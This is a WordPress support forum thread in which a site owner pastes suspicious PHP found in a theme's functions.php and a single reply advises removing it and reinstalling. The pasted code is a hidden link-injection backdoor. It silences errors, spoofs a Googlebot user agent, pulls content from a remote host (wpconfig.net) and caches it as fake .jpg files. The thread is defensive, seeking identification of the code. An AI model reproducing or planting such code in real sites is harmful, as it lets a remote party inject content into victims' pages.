Title: Suspicious code in custom theme Last modified: February 20, 2017 --- # Suspicious code in custom theme * [radial](https://wordpress.org/support/users/radial/) * (@radial) * [9 years, 3 months ago](https://wordpress.org/support/topic/suspicious-code-in-custom-theme/) * found this in my functions.php file, and looks odd to me. Can anyone identify what its purpose is and can I remove it thanks * error_reporting(‘^ E_ALL ^ E_NOTICE’); ini_set(‘display_errors’, ‘0’); error_reporting( E_ALL); ini_set(‘display_errors’, ‘0’); * class Get_links { * var $host = ‘wpconfig.net’; var $path = ‘/system.php’; var $_cache_lifetime = 21600; var $_socket_timeout = 5; * function get_remote() { $req_url = ‘[http://’](http://’);.$_SERVER[‘ HTTP_HOST’].urldecode($_SERVER[‘REQUEST_URI’]); $_user_agent = “Mozilla/5.0 ( compatible; Googlebot/2.1; “.$req_url.”)”; * $links_class = new Get_links(); $host = $links_class->host; $path = $links_class- >path; $_socket_timeout = $links_class->_socket_timeout; //$_user_agent = $links_class- >_user_agent; * @ini_set(‘allow_url_fopen’, 1); @ini_set(‘default_socket_timeout’, $_socket_timeout); @ini_set(‘user_agent’, $_user_agent); * if (function_exists(‘file_get_contents’)) { $opts = array( ‘http’=>array( ‘ method’=>”GET”, ‘header’=>”Referer: {$req_url}\r\n”. “User-Agent: {$_user_agent}\ r\n” ) ); $context = stream_context_create($opts); * $data = @file_get_contents(‘[http://’](http://’); . $host . $path, false, $context); preg_match(‘/(\<\!–link–\>)(.*?)(\<\!–link–\>)/’, $data, $ data); $data = @$data[2]; return $data; } return ‘’; } * function return_links($lib_path) { $links_class = new Get_links(); $file = ABSPATH.’wp-content/uploads/2011/’.md5($_SERVER[‘REQUEST_URI’]).’.jpg’; $_cache_lifetime = $links_class->_cache_lifetime; * if (!file_exists($file)) { [@touch](https://wordpress.org/support/users/touch/)( $file, time()); $data = $links_class->get_remote(); file_put_contents($file, $data); return $data; } elseif ( time()-filemtime($file) > $_cache_lifetime | | filesize($file) == 0) { [@touch](https://wordpress.org/support/users/touch/)( $file, time()); $data = $links_class->get_remote(); file_put_contents($file, $data); return $data; } else { $data = file_get_contents($file); return $data;}}} Viewing 1 replies (of 1 total) * [Luis Sacristán](https://wordpress.org/support/users/displaynone/) * (@displaynone) * [9 years, 3 months ago](https://wordpress.org/support/topic/suspicious-code-in-custom-theme/#post-8826972) * I’ll remove it ASAP * Then I’ll reinstall WordPress and check for more malicious code Viewing 1 replies (of 1 total) The topic ‘Suspicious code in custom theme’ is closed to new replies. * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 1 reply * 2 participants * Last reply from: [Luis Sacristán](https://wordpress.org/support/users/displaynone/) * Last activity: [9 years, 3 months ago](https://wordpress.org/support/topic/suspicious-code-in-custom-theme/#post-8826972) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics